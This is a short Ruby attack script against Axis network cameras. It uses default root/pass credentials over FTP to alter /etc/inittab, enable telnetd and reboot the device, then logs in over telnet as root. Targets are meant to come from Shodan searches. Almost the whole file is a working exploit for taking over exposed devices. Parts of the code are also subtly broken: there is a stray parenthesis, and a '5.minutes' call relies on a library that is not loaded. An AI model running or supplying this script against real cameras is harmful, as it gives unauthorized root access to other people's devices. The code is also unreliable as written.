#!/usr/bin/env ruby

# This script takes advantage of a feature from this Technical Note:
# https://www.axis.com/en/techsup/cam_servers/tech_notes/telnet_support.htm
# and a default pair of user/password unchanged

# If the reboot command is not enabled as ftp command 
# you must wait until some kind of camera reboot

require 'net/ftp'
require 'net/telnet'
require 'fileutils'

DOMAIN_NAME = "shodan powered IP"
LOGIN = "root"
PASSWORD = "pass"

# Open FTP connection
Net::FTP.open(DOMAIN_NAME, LOGIN, PASSWORD) do |ftp|
        ftp.getbinaryfile('/etc/inittab')
end

# Substitution of telnetd comment
filename = 'inittab'
text = File.read(filename)
substitution = text.gsub(/#telnetd/, "telnetd")
File.open(filename, "w") {|filename| filename.puts substitution }

# Put file and send reboot order
Net::FTP.open(DOMAIN_NAME, LOGIN, PASSWORD) do |ftp|
        ftp.putbinaryfile('inittab', '/etc/inittab')
        ftp.sendcmd('quote site reboot')
end

# Cleaning up
File.delete("./inittab")) if File.exist?("./inittab")

# wait a reasonable window
sleep(5.minutes)

# Test telnet and exit
testtelnet = Net::Telnet::new("Host" => "shodan powered ip",  "Port" => 23, "Prompt" => /[$%#>] \z/n)
testtelnet.login("root", "pass") { |c| print c }
testtelnet.cmd("\004") { |c| print c }
testtelnet.close